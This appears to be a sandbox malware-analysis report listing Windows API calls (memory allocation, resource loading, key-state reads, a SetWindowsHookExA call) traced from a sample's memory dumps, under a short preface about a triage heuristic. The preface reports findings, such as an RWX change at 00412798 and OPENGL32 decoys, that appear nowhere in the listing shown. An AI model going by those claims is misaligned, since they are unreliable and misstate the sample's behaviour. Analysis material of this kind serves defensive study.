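Run `triage(parse_api_lines(record))` on the "APIs" block of any record in this listing. For the unpacker record it returns a high finding for the in-image RWX change at 00412798 and an info finding for the five OPENGL32 decoys; the allocator record returns nothing, because MEM_RESERVE with PAGE_READWRITE is ordinary heap growth; the hook record returns a medium finding for SetWindowsHookExA. The decoy heuristic is deliberately narrow (graphics APIs beside a protection change) so that legitimate GUI code elsewhere in the listing is not scored.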

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044DC60,0044D8DC,00000000,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 004315E4
                                                                                • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 00431639
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 00431642
                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 0043164B
                                                                                • GlobalReAlloc.KERNEL32 ref: 0043165D
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 00431674
                                                                                • GlobalLock.KERNEL32 ref: 0043167B
                                                                                • LeaveCriticalSection.KERNEL32(/-B,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 00431681
                                                                                • GlobalLock.KERNEL32 ref: 00431690
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004316D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                • String ID: /-B
                                                                                • API String ID: 2667261700-1957208732
                                                                                • Opcode ID: 75d6049ef1722b00d7d67ef8744e8ad9e10414afc54e1224bd4f72fc8bf4d8ef
                                                                                • Instruction ID: 13cf7a519cd5aca61aa5c257d3bd871a532735ad1248091cfabb8f5dddfff3d7
                                                                                • Opcode Fuzzy Hash: 75d6049ef1722b00d7d67ef8744e8ad9e10414afc54e1224bd4f72fc8bf4d8ef
                                                                                • Instruction Fuzzy Hash: C73170712007059FDB249F69DC8AA2AB7F9FB48306F045A2EF852C3761EB75E9448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 0042F1CE
                                                                                • GetSystemMetrics.USER32 ref: 0042F1D5
                                                                                • GetDC.USER32(00000000), ref: 0042F1EE
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042F1FF
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042F207
                                                                                • ReleaseDC.USER32 ref: 0042F20F
                                                                                  • Part of subcall function 00431B7C: GetSystemMetrics.USER32 ref: 00431B8E
                                                                                  • Part of subcall function 00431B7C: GetSystemMetrics.USER32 ref: 00431B98
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                • String ID:
                                                                                • API String ID: 1031845853-0
                                                                                • Opcode ID: 678bd072c1f013ef6e71bf9dc481480001978fbdbca4103f4cef1d69009085f6
                                                                                • Instruction ID: b60dff0436095a2a3cd35e42cd7bad609ce9c33c1d2681f152af3d0c260ce89e
                                                                                • Opcode Fuzzy Hash: 678bd072c1f013ef6e71bf9dc481480001978fbdbca4103f4cef1d69009085f6
                                                                                • Instruction Fuzzy Hash: 63F03034A40700AEF2206F62DC49F27B7B4EF85756F10843FEA0196290DA789905CE69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000000,00000000,0042F3D3,00000000,00000000,00000000,00000000,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000,00422D2F), ref: 00431F74
                                                                                • SetErrorMode.KERNELBASE(00000000,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000,00422D2F,00000000), ref: 00431F7B
                                                                                  • Part of subcall function 00431FCE: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00431FFF
                                                                                  • Part of subcall function 00431FCE: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004320A0
                                                                                  • Part of subcall function 00431FCE: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004320CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                • String ID: /-B
                                                                                • API String ID: 3389432936-1957208732
                                                                                • Opcode ID: f3774d976a97f6d6f72b9af28574488b6dd9fc69cfbb038d953151dcdadd1df3
                                                                                • Instruction ID: b4d34eb12584c0c1ac635ce6794e2eb14ac52cb859aef63498e59811a40faf8f
                                                                                • Opcode Fuzzy Hash: f3774d976a97f6d6f72b9af28574488b6dd9fc69cfbb038d953151dcdadd1df3
                                                                                • Instruction Fuzzy Hash: E7F03770A043159FDB14EF25D444A597BE4AF4C714F05849FF4449B3A2CBB8D840CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00425348,00000000,?,?,?,00422CBF), ref: 004255A8
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00425348,00000000,?,?,?,00422CBF), ref: 004255DC
                                                                                • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00422CBF), ref: 004255F6
                                                                                • HeapFree.KERNEL32(00000000,?,?,00422CBF), ref: 0042560D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: cb68290ed235b5314457fb0e0a70ffc64d46e1a0a14e52f606e87720b15228c7
                                                                                • Instruction ID: a908bdb736778bf31c73eff07cacc3cd2293120c19c21996882aa932680f4d10
                                                                                • Opcode Fuzzy Hash: cb68290ed235b5314457fb0e0a70ffc64d46e1a0a14e52f606e87720b15228c7
                                                                                • Instruction Fuzzy Hash: E7116A34200701AFD7228F1AEC49D227BB6FB86715750492AF562C72B6C7709946CF08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,00001000), ref: 00436742
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 004367C8
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 004367DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                                                                • Instruction ID: 4a6c4b383bf5617ad2b06fc23ccaac188523056a1ad6c0ced365b9f51692f34b
                                                                                • Opcode Fuzzy Hash: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                                                                • Instruction Fuzzy Hash: CF51D7B5A00109EFDB04DF98C981EAEB7B5FF8C304F108159FA19AB340D675AE51CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0042E19D
• SetWindowsHookExA.USER32 ref: 0042E1AD
  • Part of subcall function 004319D1: __EH_prolog.LIBCMT ref: 004319D6
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: CurrentH_prologHookThreadWindows
• String ID:
• API String ID: 2183259885-0
• Opcode ID: 58fc138f468f26690cf3766432794366a105577579f07f228e96f2021765464d
• Instruction ID: 1955eefbcbf9e5b194b6998f6f80fde03342ae0f126eec52e6188af84e5dcaef
• Opcode Fuzzy Hash: 58fc138f468f26690cf3766432794366a105577579f07f228e96f2021765464d
• Instruction Fuzzy Hash: 68F0E571A403246BEB203B76A81DB2A36909F0C715F04277FB2125A1F1CBBC9D40C35D
Uniqueness

Uniqueness Score: -1.00%

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00422CAD,00000001), ref: 00424A9E
  • Part of subcall function 00424EE3: HeapAlloc.KERNEL32(00000000,00000140,00424AB2), ref: 00424EF0
• HeapDestroy.KERNEL32 ref: 00424ABC
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Heap$AllocCreateDestroy
• String ID:
• API String ID: 2236781399-0
• Opcode ID: 8c531ebd8d66de8f06d495695eabd25766e436e4be11602a9b93f7e0e09ee136
• Instruction ID: 7b4b601f46d6c8ba65f5d70c82751cbcbc83a8b9a5515441242a43bb0635cdcd
• Opcode Fuzzy Hash: 8c531ebd8d66de8f06d495695eabd25766e436e4be11602a9b93f7e0e09ee136
• Instruction Fuzzy Hash: 30E01775750310AAFB519F32EC497663AE8EB84B93F44843AF905C91A8EBA5C6809618
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00425357,000000E0,00000000,?,?,?,00422CBF), ref: 00425682
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 34d74479530f89d5faee0a5a77d84001e336a1c68622be370c1bca483279c98b
• Instruction ID: 91d80ac239c5404b2af084a63e45f6193e1148c271a930ac4fc648c2146b1e5a
• Opcode Fuzzy Hash: 34d74479530f89d5faee0a5a77d84001e336a1c68622be370c1bca483279c98b
• Instruction Fuzzy Hash: 2E31CC316006028FD314CF08D884BA5BBE0FF50368F68C2BEE5198B3A2D774E946CB44
Uniqueness

Uniqueness Score: -1.00%

APIs
• HeapAlloc.KERNEL32(00000008,?,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00425BF0
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 841efbef0d6d3901838fc0c62af2fd2a5a2b81fac177f2872f295aea61983c0b
• Instruction ID: bbb579d3fd96b107eec2e1de9fc55587986ea50d9c46ac7c70ffe5598a45c14a
• Opcode Fuzzy Hash: 841efbef0d6d3901838fc0c62af2fd2a5a2b81fac177f2872f295aea61983c0b
• Instruction Fuzzy Hash: 62016D36701E3017D51226267D81B1B2604ABC1761F890127FD50673D1EA789C40469D
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

APIs
• GetPropA.USER32 ref: 00427F75
• CallWindowProcA.USER32 ref: 00427F97
  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
Strings
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Prop$CallProcRemoveWindow
• String ID: #32770
• API String ID: 2276450057-463685578
• Opcode ID: 6567103ddafd75f8ceb98557b9f084fd5652458aea2f20f0641e91bb2f46b417
• Instruction ID: 8c9e5920a8a67ed9e748230e76886abd2d9da6cbde0234df147e64817261dc27
• Opcode Fuzzy Hash: 6567103ddafd75f8ceb98557b9f084fd5652458aea2f20f0641e91bb2f46b417
• Instruction Fuzzy Hash: 8B813C317063247BE210AB11FC45FAF775CEB867A6F81042FFE0183241DB299955C6BA
Uniqueness

Uniqueness Score: -1.00%

APIs
• CallWindowProcA.USER32 ref: 004277BA
• DefWindowProcA.USER32(00000000,?,?,?), ref: 004277CD
• IsIconic.USER32 ref: 004277EF
• SendMessageA.USER32 ref: 0042781C
• GetWindowLongA.USER32 ref: 0042782B
• GetWindowDC.USER32(00000000), ref: 0042786C
• GetWindowRect.USER32 ref: 0042787A
• InflateRect.USER32(?,000000FF,000000FF), ref: 004278BD
• InflateRect.USER32(?,000000FF,000000FF), ref: 004278E0
• SelectObject.GDI32(00000000,00000000), ref: 004278EE
• OffsetRect.USER32 ref: 00427944
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
• String ID:
• API String ID: 2215177122-0
• Opcode ID: 04f13491f957867a3ca7f3f6b56eb918565e3e6b092b22a08df0977f52fa5e5b
• Instruction ID: dfdc2a7e1658b55bc6f3650a701fb5984b333840fc68374b527215c78967b465
• Opcode Fuzzy Hash: 04f13491f957867a3ca7f3f6b56eb918565e3e6b092b22a08df0977f52fa5e5b
• Instruction Fuzzy Hash: 41819C75608300AFD300CF68DC85E6BB7E4FB89319F408A2DF94887291D775EA05CB66
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00424D09,?,Microsoft Visual C++ Runtime Library,00012010,?,004415CC,?,0044161C,?,?,?,Runtime Error!Program: ), ref: 0042637B
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00426393
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004263A4
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004263B1
Strings
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: 95e86af605773cd48e4174775bea8f941480e2610b63e4ab568ffa82ccc264fc
• Instruction ID: 5e812ea6a7feffb595f194cdb7d890e8134cc3a50fbddf809906a6b1a8c86834
• Opcode Fuzzy Hash: 95e86af605773cd48e4174775bea8f941480e2610b63e4ab568ffa82ccc264fc
• Instruction Fuzzy Hash: 35017175340321AFD710DFB6ACC0A6B3AECBA59751315047BE900C2271DBB8C840CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(?,?,00000002), ref: 00429FE3
• SizeofResource.KERNEL32(?,00000000,?,73FD2D10,00000000,73FD17C0,?,?,?,?,?,?,?,?,00427C21,00000001), ref: 00429FFD
• LoadResource.KERNEL32(?,00000000,?,73FD2D10,00000000,73FD17C0,?,?,?,?,?,?,?,?,00427C21,00000001), ref: 0042A007
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Resource$FindLoadSizeof
• String ID:
• API String ID: 507330600-0
• Opcode ID: 8bab794a205b5453a26984dc127781f11760d456e8a69ff356ad02a631c6113c
• Instruction ID: a7c23153afd0a064990b4b067bbf81c5deb415718921ed192bc1ae2d90173566
• Opcode Fuzzy Hash: 8bab794a205b5453a26984dc127781f11760d456e8a69ff356ad02a631c6113c
• Instruction Fuzzy Hash: B541FD323042105BE70CCE29A856AAF77D2EBC9351F048A3EF946C3381DFB58909C3A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• Part of subcall function 0042D8A8: GetWindowLongA.USER32 ref: 0042D8B4
• GetKeyState.USER32(00000010), ref: 0042CCFE
• GetKeyState.USER32(00000011), ref: 0042CD07
• GetKeyState.USER32(00000012), ref: 0042CD10
• SendMessageA.USER32 ref: 0042CD26
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: State$LongMessageSendWindow
• String ID:
• API String ID: 1063413437-0
• Opcode ID: 39f3a8292884866b0136ab7819e78f3620a8e5951e08313c28e82afd734122b5
• Instruction ID: 7867d4aebb8446bb121516b1bc0384815800b265f1f1e5fbe955967136b801bb
• Opcode Fuzzy Hash: 39f3a8292884866b0136ab7819e78f3620a8e5951e08313c28e82afd734122b5
• Instruction Fuzzy Hash: 00F0E27274036625E92036953CC2F9E86144F50F95FC0083BBB00AB1D1C99D88020AF8
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87f92d669cfe0f0c4725d900969239a60b6100f6613200dc66065f134221cb4c
• Instruction ID: c04ec5e69cb9bfec964118c071885eacb722eba8d14d52d707a08c5a68c96e76
• Opcode Fuzzy Hash: 87f92d669cfe0f0c4725d900969239a60b6100f6613200dc66065f134221cb4c
• Instruction Fuzzy Hash: 4FF03C3570111DAADF01AF61EC04AAE3BB9AF20345F84C027FC1695171DB38CA55DB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(?,?,000000F0), ref: 0042D1B3
• LoadResource.KERNEL32(?,00000000,?,?,?,0042ACDD,?,?,0040109A), ref: 0042D1BF
• LockResource.KERNEL32(00000000,?,?,?,0042ACDD,?,?,0040109A), ref: 0042D1CE
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Resource$FindLoadLock
• String ID:
• API String ID: 2752051264-0
• Opcode ID: 482a25458762e2edea2817c7c68e005cbdb8bb3a8fe823c035c25d2d577ffbb0
• Instruction ID: 4bc090be9f026aa9fd5f9b04e0483d8cfc6de5fa6684b686bd51774235a3835f
• Opcode Fuzzy Hash: 482a25458762e2edea2817c7c68e005cbdb8bb3a8fe823c035c25d2d577ffbb0
• Instruction Fuzzy Hash: 53E06D32B00126AB8B115F616C4987FB66EAFC53A2B54483BF902D2911CB688D2196B9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000010), ref: 0042E55E
• GetKeyState.USER32(00000011), ref: 0042E567
• GetKeyState.USER32(00000012), ref: 0042E570
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: State
• String ID:
• API String ID: 1649606143-0
• Opcode ID: 206560a21e7653420da39caafce20ed01bc2e8c922614f8c83646a4c0d6d9dc4
